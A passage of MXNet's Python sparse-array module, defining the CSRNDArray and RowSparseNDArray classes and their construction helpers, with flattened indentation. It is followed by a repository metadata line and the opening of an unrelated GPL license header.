>>> a[1].asnumpy()
array([[ 0., 0., 3.]], dtype=float32)
>>> a[-1].asnumpy()
array([[ 4., 5., 6.]], dtype=float32)
"""
if isinstance(key, int):
if key == -1:
begin = self.shape[0] - 1
else:
begin = key
return op.slice(self, begin=begin, end=begin+1)
if isinstance(key, py_slice):
if key.step is not None:
raise ValueError('CSRNDArray only supports continuous slicing on axis 0')
if key.start is not None or key.stop is not None:
begin = key.start if key.start else 0
end = key.stop if key.stop else self.shape[0]
return op.slice(self, begin=begin, end=end)
else:
return self
if isinstance(key, tuple):
raise ValueError('Multi-dimension indexing is not supported')
def __setitem__(self, key, value):
"""x.__setitem__(i, y) <=> x[i]=y
Set self[key] to value. Only slice key [:] is supported.
Parameters
----------
key : slice
The indexing key.
value : NDArray or CSRNDArray or numpy.ndarray
The value to set.
Examples
--------
>>> src = mx.nd.sparse.zeros('csr', (3,3))
>>> src.asnumpy()
array([[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
>>> # assign CSRNDArray with same storage type
>>> x = mx.nd.ones('row_sparse', (3,3)).tostype('csr')
>>> x[:] = src
>>> x.asnumpy()
array([[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]], dtype=float32)
>>> # assign NDArray to CSRNDArray
>>> x[:] = mx.nd.ones((3,3)) * 2
>>> x.asnumpy()
array([[ 2., 2., 2.],
[ 2., 2., 2.],
[ 2., 2., 2.]], dtype=float32)
"""
if not self.writable:
raise ValueError('Failed to assign to a readonly CSRNDArray')
if isinstance(key, py_slice):
if key.step is not None or key.start is not None or key.stop is not None:
raise ValueError('Assignment with slice for CSRNDArray is not ' \
                                 'implemented yet.')
if isinstance(value, NDArray):
# avoid copying to itself
if value.handle is not self.handle:
value.copyto(self)
elif isinstance(value, numeric_types):
raise ValueError("Assigning numeric types to CSRNDArray is " \
"not implemented yet.")
elif isinstance(value, (np.ndarray, np.generic)):
# TODO(haibin/anisub) check scipy.sparse and use _sync_copy_from to
# avoid the temporary copy
warnings.warn('Assigning non-NDArray object to CSRNDArray is not efficient',
RuntimeWarning)
tmp = _array(value)
tmp.copyto(self)
else:
raise TypeError('type %s not supported' % str(type(value)))
else:
assert(isinstance(key, (int, tuple)))
raise Exception('CSRNDArray only supports [:] for assignment')
@property
def indices(self):
"""A deep copy NDArray of the indices array of the CSRNDArray.
This generates a deep copy of the column indices of the current `csr` matrix.
Returns
-------
NDArray
This CSRNDArray's indices array.
"""
return self._aux_data(1)
@property
def indptr(self):
"""A deep copy NDArray of the indptr array of the CSRNDArray.
This generates a deep copy of the `indptr` of the current `csr` matrix.
Returns
-------
NDArray
This CSRNDArray's indptr array.
"""
return self._aux_data(0)
@property
def data(self):
"""A deep copy NDArray of the data array of the CSRNDArray.
This generates a deep copy of the `data` of the current `csr` matrix.
Returns
-------
NDArray
This CSRNDArray's data array.
"""
return self._data()
@indices.setter
def indices(self, indices):
raise NotImplementedError()
@indptr.setter
def indptr(self, indptr):
raise NotImplementedError()
@data.setter
def data(self, data):
raise NotImplementedError()
def tostype(self, stype):
"""Return a copy of the array with chosen storage type.
Returns
-------
NDArray or CSRNDArray
A copy of the array with the chosen storage stype
"""
if stype == 'row_sparse':
raise ValueError("cast_storage from csr to row_sparse is not supported")
return op.cast_storage(self, stype=stype)
def copyto(self, other):
"""Copies the value of this array to another array.
If ``other`` is a ``NDArray`` or ``CSRNDArray`` object, then ``other.shape`` and
``self.shape`` should be the same. This function copies the value from
``self`` to ``other``.
If ``other`` is a context, a new ``CSRNDArray`` will be first created on
the target context, and the value of ``self`` is copied.
Parameters
----------
other : NDArray or CSRNDArray or Context
The destination array or context.
Returns
-------
NDArray or CSRNDArray
The copied array. If ``other`` is an ``NDArray`` or ``CSRNDArray``, then the return
value and ``other`` will point to the same ``NDArray`` or ``CSRNDArray``.
"""
if isinstance(other, Context):
return super(CSRNDArray, self).copyto(other)
elif isinstance(other, NDArray):
stype = other.stype
if stype == 'default' or stype == 'csr':
return super(CSRNDArray, self).copyto(other)
else:
raise TypeError('copyto does not support destination NDArray stype ' + str(stype))
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def asscipy(self):
"""Returns a ``scipy.sparse.csr.csr_matrix`` object with value copied from this array
Examples
--------
>>> x = mx.nd.sparse.zeros('csr', (2,3))
>>> y = x.asscipy()
>>> type(y)
<type 'scipy.sparse.csr.csr_matrix'>
>>> y
<2x3 sparse matrix of type '<type 'numpy.float32'>'
with 0 stored elements in Compressed Sparse Row format>
"""
data = self.data.asnumpy()
indices = self.indices.asnumpy()
indptr = self.indptr.asnumpy()
if not spsp:
raise ImportError("scipy is not available. \
Please check if the scipy python bindings are installed.")
return spsp.csr_matrix((data, indices, indptr), shape=self.shape, dtype=self.dtype)
# pylint: disable=abstract-method
class RowSparseNDArray(BaseSparseNDArray):
"""A sparse representation of a set of NDArray row slices at given indices.
A RowSparseNDArray represents a multidimensional NDArray using two separate arrays: `data` and
`indices`. The number of dimensions has to be at least 2.
- data: an NDArray of any dtype with shape [D0, D1, ..., Dn].
- indices: a 1-D int64 NDArray with shape [D0] with values sorted in ascending order.
The `indices` stores the indices of the row slices with non-zeros,
while the values are stored in `data`. The corresponding NDArray ``dense``
represented by RowSparseNDArray ``rsp`` has
``dense[rsp.indices[i], :, :, :, ...] = rsp.data[i, :, :, :, ...]``
>>> dense.asnumpy()
array([[ 1., 2., 3.],
[ 0., 0., 0.],
[ 4., 0., 5.],
[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
>>> rsp = dense.tostype('row_sparse')
>>> rsp.indices.asnumpy()
array([0, 2], dtype=int64)
>>> rsp.data.asnumpy()
array([[ 1., 2., 3.],
[ 4., 0., 5.]], dtype=float32)
A RowSparseNDArray is typically used to represent non-zero row slices of a large NDArray
of shape [LARGE0, D1, .. , Dn] where LARGE0 >> D0 and most row slices are zeros.
RowSparseNDArray is used principally in the definition of gradients for operations
that have sparse gradients (e.g. sparse dot and sparse embedding).
See Also
--------
row_sparse_array: Several ways to construct a RowSparseNDArray
"""
def __reduce__(self):
return RowSparseNDArray, (None,), super(RowSparseNDArray, self).__getstate__()
def __iadd__(self, other):
(self + other).copyto(self)
return self
def __isub__(self, other):
(self - other).copyto(self)
return self
def __imul__(self, other):
(self * other).copyto(self)
return self
def __idiv__(self, other):
(self / other).copyto(self)
return self
def __itruediv__(self, other):
(self / other).copyto(self)
return self
def __getitem__(self, key):
"""x.__getitem__(i) <=> x[i]
Returns a sliced view of this array.
Parameters
----------
key : slice
Indexing key.
Examples
--------
>>> x = mx.nd.sparse.zeros('row_sparse', (2, 3))
>>> x[:].asnumpy()
array([[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
"""
if isinstance(key, int):
raise Exception("__getitem__ with int key is not implemented for RowSparseNDArray yet")
if isinstance(key, py_slice):
if key.step is not None or key.start is not None or key.stop is not None:
raise Exception('RowSparseNDArray only supports [:] for __getitem__')
else:
return self
if isinstance(key, tuple):
raise ValueError('Multi-dimension indexing is not supported')
def __setitem__(self, key, value):
"""x.__setitem__(i, y) <=> x[i]=y
Set self[key] to value. Only slice key [:] is supported.
Parameters
----------
key : slice
The indexing key.
value : NDArray or numpy.ndarray
The value to set.
Examples
--------
>>> src = mx.nd.row_sparse([[1, 0, 2], [4, 5, 6]], [0, 2], (3,3))
>>> src.asnumpy()
array([[ 1., 0., 2.],
[ 0., 0., 0.],
[ 4., 5., 6.]], dtype=float32)
>>> # assign RowSparseNDArray with same storage type
>>> x = mx.nd.sparse.zeros('row_sparse', (3,3))
>>> x[:] = src
>>> x.asnumpy()
array([[ 1., 0., 2.],
[ 0., 0., 0.],
[ 4., 5., 6.]], dtype=float32)
>>> # assign NDArray to RowSparseNDArray
>>> x[:] = mx.nd.ones((3,3))
>>> x.asnumpy()
array([[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]], dtype=float32)
"""
if not self.writable:
raise ValueError('Failed to assign to a readonly RowSparseNDArray')
if isinstance(key, py_slice):
if key.step is not None or key.start is not None or key.stop is not None:
raise ValueError('Assignment with slice for RowSparseNDArray ' \
                                 'is not implemented yet.')
if isinstance(value, NDArray):
# avoid copying to itself
if value.handle is not self.handle:
value.copyto(self)
elif isinstance(value, numeric_types):
raise ValueError("Assigning numeric types to RowSparseNDArray " \
"is not implemented yet.")
elif isinstance(value, (np.ndarray, np.generic)):
warnings.warn('Assigning non-NDArray object to RowSparseNDArray is not efficient',
RuntimeWarning)
tmp = _array(value)
tmp.copyto(self)
else:
raise TypeError('type %s not supported' % str(type(value)))
else:
assert(isinstance(key, (int, tuple)))
raise TypeError('RowSparseNDArray only supports [:] for assignment')
@property
def indices(self):
"""A deep copy NDArray of the indices array of the RowSparseNDArray.
This generates a deep copy of the row indices of the current `row_sparse` matrix.
Returns
-------
NDArray
This RowSparseNDArray's indices array.
"""
return self._aux_data(0)
@property
def data(self):
"""A deep copy NDArray of the data array of the RowSparseNDArray.
This generates a deep copy of the `data` of the current `row_sparse` matrix.
Returns
-------
NDArray
This RowSparseNDArray's data array.
"""
return self._data()
@indices.setter
def indices(self, indices):
raise NotImplementedError()
@data.setter
def data(self, data):
raise NotImplementedError()
def tostype(self, stype):
"""Return a copy of the array with chosen storage type.
Returns
-------
NDArray or RowSparseNDArray
A copy of the array with the chosen storage stype
"""
if stype == 'csr':
raise ValueError("cast_storage from row_sparse to csr is not supported")
return op.cast_storage(self, stype=stype)
def copyto(self, other):
"""Copies the value of this array to another array.
If ``other`` is a ``NDArray`` or ``RowSparseNDArray`` object, then ``other.shape``
and ``self.shape`` should be the same. This function copies the value from
``self`` to ``other``.
If ``other`` is a context, a new ``RowSparseNDArray`` will be first created on
the target context, and the value of ``self`` is copied.
Parameters
----------
other : NDArray or RowSparseNDArray or Context
The destination array or context.
Returns
-------
NDArray or RowSparseNDArray
The copied array. If ``other`` is an ``NDArray`` or ``RowSparseNDArray``, then the
return value and ``other`` will point to the same ``NDArray`` or ``RowSparseNDArray``.
"""
if isinstance(other, Context):
return super(RowSparseNDArray, self).copyto(other)
elif isinstance(other, NDArray):
stype = other.stype
if stype == 'default' or stype == 'row_sparse':
return super(RowSparseNDArray, self).copyto(other)
else:
raise TypeError('copyto does not support destination NDArray stype ' + str(stype))
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def retain(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`retain`.
The arguments are the same as for :py:func:`retain`, with
this array as data.
"""
return retain(self, *args, **kwargs)
def _prepare_src_array(source_array, dtype):
"""Prepare `source_array` so that it can be used to construct NDArray.
`source_array` is converted to a `np.ndarray` if it's neither an `NDArray` \
nor an `np.ndarray`.
"""
if not isinstance(source_array, NDArray) and not isinstance(source_array, np.ndarray):
try:
source_array = np.array(source_array, dtype=dtype)
except:
raise TypeError('values must be array like object')
return source_array
def _prepare_default_dtype(src_array, dtype):
"""Prepare the value of dtype if `dtype` is None. If `src_array` is an NDArray, numpy.ndarray
or scipy.sparse.csr.csr_matrix, return src_array.dtype. float32 is returned otherwise."""
if dtype is None:
if isinstance(src_array, (NDArray, np.ndarray)):
dtype = src_array.dtype
elif spsp and isinstance(src_array, spsp.csr.csr_matrix):
dtype = src_array.dtype
else:
dtype = mx_real_t
return dtype
def _check_shape(s1, s2):
"""check s1 == s2 if both are not None"""
if s1 and s2 and s1 != s2:
raise ValueError("Shape mismatch detected. " + str(s1) + " v.s. " + str(s2))
def csr_matrix(arg1, shape=None, ctx=None, dtype=None):
"""Creates a `CSRNDArray`, an 2D array with compressed sparse row (CSR) format.
The CSRNDArray can be instantiated in several ways:
- csr_matrix(D):
to construct a CSRNDArray with a dense 2D array ``D``
- **D** (*array_like*) - An object exposing the array interface, an object whose \
`__array__` method returns an array, or any (nested) sequence.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``D.dtype`` if ``D`` is an NDArray or numpy.ndarray, \
float32 otherwise.
- csr_matrix(S)
to construct a CSRNDArray with a sparse 2D array ``S``
- **S** (*CSRNDArray or scipy.sparse.csr.csr_matrix*) - A sparse matrix.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``S.dtype``.
- csr_matrix((M, N))
to construct an empty CSRNDArray with shape ``(M, N)``
- **M** (*int*) - Number of rows in the matrix
- **N** (*int*) - Number of columns in the matrix
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
- csr_matrix((data, indices, indptr))
to construct a CSRNDArray based on the definition of compressed sparse row format \
using three separate arrays, \
where the column indices for row i are stored in ``indices[indptr[i]:indptr[i+1]]`` \
and their corresponding values are stored in ``data[indptr[i]:indptr[i+1]]``. \
The column indices for a given row are expected to be **sorted in ascending order.** \
Duplicate column entries for the same row are not allowed.
- **data** (*array_like*) - An object exposing the array interface, which \
holds all the non-zero entries of the matrix in row-major order.
- **indices** (*array_like*) - An object exposing the array interface, which \
stores the column index for each non-zero element in ``data``.
- **indptr** (*array_like*) - An object exposing the array interface, which \
stores the offset into ``data`` of the first non-zero element number of each \
row of the matrix.
- **shape** (*tuple of int, optional*) - The shape of the array. The default \
shape is inferred from the indices and indptr arrays.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``data.dtype`` if ``data`` is an NDArray or numpy.ndarray, \
float32 otherwise.
- csr_matrix((data, (row, col)))
to construct a CSRNDArray based on the COOrdinate format \
        using three separate arrays, \
where ``row[i]`` is the row index of the element, \
``col[i]`` is the column index of the element \
and ``data[i]`` is the data corresponding to the element. All the missing \
elements in the input are taken to be zeroes.
- **data** (*array_like*) - An object exposing the array interface, which \
holds all the non-zero entries of the matrix in COO format.
- **row** (*array_like*) - An object exposing the array interface, which \
stores the row index for each non zero element in ``data``.
- **col** (*array_like*) - An object exposing the array interface, which \
stores the col index for each non zero element in ``data``.
- **shape** (*tuple of int, optional*) - The shape of the array. The default \
shape is inferred from the ``row`` and ``col`` arrays.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
Parameters
----------
arg1: tuple of int, tuple of array_like, array_like, CSRNDArray, scipy.sparse.csr_matrix, \
scipy.sparse.coo_matrix, tuple of int or tuple of array_like
The argument to help instantiate the csr matrix. See above for further details.
shape : tuple of int, optional
The shape of the csr matrix.
ctx: Context, optional
Device context (default is the current default context).
dtype: str or numpy.dtype, optional
The data type of the output array.
Returns
-------
CSRNDArray
A `CSRNDArray` with the `csr` storage representation.
Example
-------
>>> a = mx.nd.sparse.csr_matrix(([1, 2, 3], [1, 0, 2], [0, 1, 2, 2, 3]), shape=(4, 3))
>>> a.asnumpy()
array([[ 0., 1., 0.],
[ 2., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 3.]], dtype=float32)
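    The same matrix can also be constructed from COO-style ``(data, (row, col))``
    input (illustrative sketch only; this form requires scipy to be installed):
    >>> b = mx.nd.sparse.csr_matrix(([1, 2, 3], ([0, 1, 3], [1, 0, 2])), shape=(4, 3), dtype='float32')
    >>> b.asnumpy()
    array([[ 0.,  1.,  0.],
           [ 2.,  0.,  0.],
           [ 0.,  0.,  0.],
           [ 0.,  0.,  3.]], dtype=float32)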
See Also
--------
CSRNDArray : MXNet NDArray in compressed sparse row format.
"""
# construct a csr matrix from (M, N) or (data, indices, indptr)
if isinstance(arg1, tuple):
arg_len = len(arg1)
if arg_len == 2:
# construct a sparse csr matrix from
# scipy coo matrix if input format is coo
if isinstance(arg1[1], tuple) and len(arg1[1]) == 2:
data, (row, col) = arg1
if isinstance(data, NDArray):
data = data.asnumpy()
if isinstance(row, NDArray):
row = row.asnumpy()
if isinstance(col, NDArray):
col = col.asnumpy()
coo = spsp.coo_matrix((data, (row, col)), shape=shape)
_check_shape(coo.shape, shape)
csr = coo.tocsr()
return array(csr, ctx=ctx, dtype=dtype)
else:
# empty matrix with shape
_check_shape(arg1, shape)
return empty('csr', arg1, ctx=ctx, dtype=dtype)
elif arg_len == 3:
# data, indices, indptr
return _csr_matrix_from_definition(arg1[0], arg1[1], arg1[2], shape=shape,
ctx=ctx, dtype=dtype)
else:
raise ValueError("Unexpected length of input tuple: " + str(arg_len))
else:
# construct a csr matrix from a sparse / dense one
if isinstance(arg1, CSRNDArray) or (spsp and isinstance(arg1, spsp.csr.csr_matrix)):
# construct a csr matrix from scipy or CSRNDArray
_check_shape(arg1.shape, shape)
return array(arg1, ctx=ctx, dtype=dtype)
elif isinstance(arg1, RowSparseNDArray):
raise ValueError("Unexpected input type: RowSparseNDArray")
else:
# construct a csr matrix from a dense one
# prepare default ctx and dtype since mx.nd.array doesn't use default values
# based on source_array
dtype = _prepare_default_dtype(arg1, dtype)
# create dns array with provided dtype. ctx is not passed since copy across
# ctx requires dtype to be the same
dns = _array(arg1, dtype=dtype)
if ctx is not None and dns.context != ctx:
dns = dns.as_in_context(ctx)
_check_shape(dns.shape, shape)
return dns.tostype('csr')
def _csr_matrix_from_definition(data, indices, indptr, shape=None, ctx=None,
dtype=None, indices_type=None, indptr_type=None):
"""Create a `CSRNDArray` based on data, indices and indptr"""
storage_type = 'csr'
# context
ctx = Context.default_ctx if ctx is None else ctx
# types
dtype = _prepare_default_dtype(data, dtype)
indptr_type = _STORAGE_AUX_TYPES[storage_type][0] if indptr_type is None else indptr_type
indices_type = _STORAGE_AUX_TYPES[storage_type][1] if indices_type is None else indices_type
# prepare src array and types
data = _prepare_src_array(data, dtype)
indptr = _prepare_src_array(indptr, indptr_type)
indices = _prepare_src_array(indices, indices_type)
# TODO(junwu): Convert data, indptr, and indices to mxnet NDArrays
# if they are not for now. In the future, we should provide a c-api
# to accept np.ndarray types to copy from to result.data and aux_data
if not isinstance(data, NDArray):
data = _array(data, ctx, dtype)
if not isinstance(indptr, NDArray):
indptr = _array(indptr, ctx, indptr_type)
if not isinstance(indices, NDArray):
indices = _array(indices, ctx, indices_type)
if shape is None:
if indices.shape[0] == 0:
raise ValueError('invalid shape')
shape = (len(indptr) - 1, op.max(indices).asscalar() + 1)
# verify shapes
aux_shapes = [indptr.shape, indices.shape]
if data.ndim != 1 or indptr.ndim != 1 or indices.ndim != 1 or \
indptr.shape[0] == 0 or len(shape) != 2:
raise ValueError('invalid shape')
result = CSRNDArray(_new_alloc_handle(storage_type, shape, ctx, False, dtype,
[indptr_type, indices_type], aux_shapes))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, data.handle, ctypes.c_int(-1)))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, indptr.handle, ctypes.c_int(0)))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, indices.handle, ctypes.c_int(1)))
return result
def row_sparse_array(arg1, shape=None, ctx=None, dtype=None):
"""Creates a `RowSparseNDArray`, a multidimensional row sparse array with a set of \
tensor slices at given indices.
The RowSparseNDArray can be instantiated in several ways:
- row_sparse_array(D):
to construct a RowSparseNDArray with a dense ndarray ``D``
- **D** (*array_like*) - An object exposing the array interface, an object whose \
`__array__` method returns an array, or any (nested) sequence.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``D.dtype`` if ``D`` is an NDArray or numpy.ndarray, \
float32 otherwise.
- row_sparse_array(S)
to construct a RowSparseNDArray with a sparse ndarray ``S``
- **S** (*RowSparseNDArray*) - A sparse ndarray.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is ``S.dtype``.
- row_sparse_array((D0, D1 .. Dn))
to construct an empty RowSparseNDArray with shape ``(D0, D1, ... Dn)``
- **D0, D1 .. Dn** (*int*) - The shape of the ndarray
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
- row_sparse_array((data, indices))
to construct a RowSparseNDArray based on the definition of row sparse format \
using two separate arrays, \
where the `indices` stores the indices of the row slices with non-zeros,
while the values are stored in `data`. The corresponding NDArray ``dense``
represented by RowSparseNDArray ``rsp`` has \
``dense[rsp.indices[i], :, :, :, ...] = rsp.data[i, :, :, :, ...]``
        The row indices are expected to be **sorted in ascending order.** \
- **data** (*array_like*) - An object exposing the array interface, which \
holds all the non-zero row slices of the array.
- **indices** (*array_like*) - An object exposing the array interface, which \
stores the row index for each row slice with non-zero elements.
- **shape** (*tuple of int, optional*) - The shape of the array. The default \
        shape is inferred from the indices and data arrays.
- **ctx** (*Context, optional*) - Device context \
(default is the current default context).
- **dtype** (*str or numpy.dtype, optional*) - The data type of the output array. \
The default dtype is float32.
Parameters
----------
arg1: NDArray, numpy.ndarray, RowSparseNDArray, tuple of int or tuple of array_like
The argument to help instantiate the row sparse ndarray. See above for further details.
shape : tuple of int, optional
The shape of the row sparse ndarray.
ctx : Context, optional
Device context (default is the current default context).
dtype : str or numpy.dtype, optional
The data type of the output array.
Returns
-------
RowSparseNDArray
        A `RowSparseNDArray` with the `row_sparse` storage representation.
Example
-------
>>> a = mx.nd.sparse.row_sparse_array(([[1, 2], [3, 4]], [1, 4]), shape=(6, 2))
>>> a.asnumpy()
array([[ 0., 0.],
[ 1., 2.],
[ 0., 0.],
[ 0., 0.],
[ 3., 4.],
[ 0., 0.]], dtype=float32)
See Also
--------
RowSparseNDArray : MXNet NDArray in row sparse format.
"""
# construct a row sparse array from (D0, D1 ..) or (data, indices)
if isinstance(arg1, tuple):
arg_len = len(arg1)
if arg_len < 2:
raise ValueError("Unexpected length of input tuple: " + str(arg_len))
elif arg_len > 2:
# empty ndarray with shape
_check_shape(arg1, shape)
return empty('row_sparse', arg1, ctx=ctx, dtype=dtype)
else:
# len(arg1) = 2, is either shape or (data, indices)
if isinstance(arg1[0], integer_types) and isinstance(arg1[1], integer_types):
# empty ndarray with shape
_check_shape(arg1, shape)
return empty('row_sparse', arg1, ctx=ctx, dtype=dtype)
else:
                # data, indices
return _row_sparse_ndarray_from_definition(arg1[0], arg1[1], shape=shape,
ctx=ctx, dtype=dtype)
else:
# construct a row sparse ndarray from a dense / sparse array
if isinstance(arg1, RowSparseNDArray):
# construct a row sparse ndarray from RowSparseNDArray
_check_shape(arg1.shape, shape)
return array(arg1, ctx=ctx, dtype=dtype)
elif isinstance(arg1, CSRNDArray):
raise ValueError("Unexpected input type: CSRNDArray")
else:
            # construct a row sparse ndarray from a dense one
# prepare default dtype since mx.nd.array doesn't use default values
# based on source_array
dtype = _prepare_default_dtype(arg1, dtype)
# create dns array with provided dtype. ctx is not passed since copy across
# ctx requires dtype to be the same
dns = _array(arg1, dtype=dtype)
if ctx is not None and dns.context != ctx:
dns = dns.as_in_context(ctx)
_check_shape(dns.shape, shape)
return dns.tostype('row_sparse')
def _row_sparse_ndarray_from_definition(data, indices, shape=None, ctx=None,
dtype=None, indices_type=None):
"""Create a `RowSparseNDArray` based on data and indices"""
storage_type = 'row_sparse'
# context
ctx = Context.default_ctx if ctx is None else ctx
# types
dtype = _prepare_default_dtype(data, dtype)
indices_type = _STORAGE_AUX_TYPES[storage_type][0] if indices_type is None else indices_type
# prepare src array and types
data = _prepare_src_array(data, dtype)
indices = _prepare_src_array(indices, indices_type)
# TODO(junwu): Convert data, indptr, and indices to mxnet NDArrays
# if they are not for now. In the future, we should provide a c-api
# to accept np.ndarray types to copy from to result.data and aux_data
if not isinstance(data, NDArray):
data = _array(data, ctx, dtype)
if not isinstance(indices, NDArray):
indices = _array(indices, ctx, indices_type)
if shape is None:
num_indices = indices.shape[0]
if num_indices == 0:
raise ValueError('invalid shape')
dim0 = indices[num_indices - 1].asscalar() + 1
shape = (dim0, ) + data.shape[1:]
# verify shapes
if data.ndim != len(shape) or indices.ndim != 1 or np.prod(shape[1:]) == 0:
raise ValueError("invalid shape")
result = RowSparseNDArray(_new_alloc_handle(storage_type, shape, ctx, False, dtype,
[indices_type], [indices.shape]))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, data.handle, ctypes.c_int(-1)))
check_call(_LIB.MXNDArraySyncCopyFromNDArray(result.handle, indices.handle, ctypes.c_int(0)))
return result
def _ndarray_cls(handle, writable=True, stype=_STORAGE_TYPE_UNDEFINED):
if stype == _STORAGE_TYPE_UNDEFINED:
stype = _storage_type(handle)
if stype == _STORAGE_TYPE_DEFAULT:
return NDArray(handle, writable=writable)
elif stype == _STORAGE_TYPE_CSR:
return CSRNDArray(handle, writable=writable)
elif stype == _STORAGE_TYPE_ROW_SPARSE:
return RowSparseNDArray(handle, writable=writable)
else:
raise Exception("unknown storage type: %s"%stype)
_set_ndarray_class(_ndarray_cls)
def zeros(stype, shape, ctx=None, dtype=None, **kwargs):
"""Return a new array of given shape and type, filled with zeros.
Parameters
----------
stype: string
The storage type of the empty array, such as 'row_sparse', 'csr', etc
shape : int or tuple of int
The shape of the empty array
ctx : Context, optional
An optional device context (default is the current default context)
dtype : str or numpy.dtype, optional
An optional value type (default is `float32`)
Returns
-------
RowSparseNDArray or CSRNDArray
A created array
Examples
--------
>>> mx.nd.sparse.zeros('csr', (1,2))
<CSRNDArray 1x2 @cpu(0)>
>>> mx.nd.sparse.zeros('row_sparse', (1,2), ctx=mx.cpu(), dtype='float16').asnumpy()
array([[ 0., 0.]], dtype=float16)
"""
if stype == 'default':
return _zeros_ndarray(shape, ctx=ctx, dtype=dtype, **kwargs)
if ctx is None:
ctx = Context.default_ctx
dtype = mx_real_t if dtype is None else dtype
if stype == 'row_sparse' or stype == 'csr':
aux_types = _STORAGE_AUX_TYPES[stype]
else:
raise ValueError("unknown storage type" + stype)
out = _ndarray_cls(_new_alloc_handle(stype, shape, ctx, True, dtype, aux_types))
return _internal._zeros(shape=shape, ctx=ctx, dtype=dtype, out=out, **kwargs)
def empty(stype, shape, ctx=None, dtype=None):
"""Returns a new array of given shape and type, without initializing entries.
Parameters
----------
stype: string
The storage type of the empty array, such as 'row_sparse', 'csr', etc
shape : int or tuple of int
The shape of the empty array.
ctx : Context, optional
An optional device context (default is the current default context).
dtype : str or numpy.dtype, optional
An optional value type (default is `float32`).
Returns
-------
CSRNDArray or RowSparseNDArray
A created array.
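    Examples
    --------
    >>> # illustrative; `empty` currently delegates to `zeros`, so entries are zero-filled
    >>> mx.nd.sparse.empty('csr', (2, 3))
    <CSRNDArray 2x3 @cpu(0)>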
"""
if isinstance(shape, int):
shape = (shape, )
if ctx is None:
ctx = Context.default_ctx
if dtype is None:
dtype = mx_real_t
assert(stype is not None)
if stype == 'csr' or stype == 'row_sparse':
return zeros(stype, shape, ctx=ctx, dtype=dtype)
else:
raise Exception("unknown stype : " + str(stype))
def array(source_array, ctx=None, dtype=None):
"""Creates a sparse array from any object exposing the array interface.
Parameters
----------
source_array : RowSparseNDArray, CSRNDArray or scipy.sparse.csr.csr_matrix
The source sparse array
ctx : Context, optional
The default context is ``source_array.context`` if ``source_array`` is an NDArray. \
The current default context otherwise.
dtype : str or numpy.dtype, optional
The data type of the output array. The default dtype is ``source_array.dtype``
if `source_array` is an `NDArray`, `numpy.ndarray` or `scipy.sparse.csr.csr_matrix`, \
`float32` otherwise.
Returns
-------
RowSparseNDArray or CSRNDArray
An array with the same contents as the `source_array`.
Examples
--------
>>> import scipy.sparse as spsp
>>> csr = spsp.csr_matrix((2, 100))
>>> mx.nd.sparse.array(csr)
<CSRNDArray 2x100 @cpu(0)>
>>> mx.nd.sparse.array(mx.nd.sparse.zeros('csr', (3, 2)))
<CSRNDArray 3x2 @cpu(0)>
>>> mx.nd.sparse.array(mx.nd.sparse.zeros('row_sparse', (3, 2)))
<RowSparseNDArray 3x2 @cpu(0)>
"""
ctx = Context.default_ctx if ctx is None else ctx
if isinstance(source_array, NDArray):
assert(source_array.stype != 'default'), \
"Please use `tostype` to create RowSparseNDArray or CSRNDArray from an NDArray"
# prepare dtype and ctx based on source_array, if not provided
dtype = _prepare_default_dtype(source_array, dtype)
# if both dtype and ctx are different from source_array, we cannot copy directly
if source_array.dtype != dtype and source_array.context != ctx:
arr = empty(source_array.stype, source_array.shape, dtype=dtype)
arr[:] = source_array
arr = arr.as_in_context(ctx)
else:
arr = empty(source_array.stype, source_array.shape, dtype=dtype, ctx=ctx)
arr[:] = source_array
return arr
elif spsp and isinstance(source_array, spsp.csr.csr_matrix):
# TODO(haibin) implement `_sync_copy_from` with scipy csr object to reduce a copy
# preprocess scipy csr to canonical form
csr = source_array.sorted_indices()
csr.sum_duplicates()
dtype = _prepare_default_dtype(source_array, dtype)
return csr_matrix((csr.data, csr.indices, csr.indptr), shape=csr.shape, \
dtype=dtype, ctx=ctx)
elif isinstance(source_array, (np.ndarray, np.generic)):
raise ValueError("Please use mx.nd.array to create an NDArray with source_array of type ",
type(source_array))
else:
raise ValueError("Unexpected source_array type: ", type(source_array))
| madjam/mxnet | python/mxnet/ndarray/sparse.py | Python | apache-2.0 | 50,947 | 0.003199 |
# vi: ts=4 expandtab
#
# Copyright (C) 2013 Canonical Ltd.
#
# Author: Ben Howard <ben.howard@canonical.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
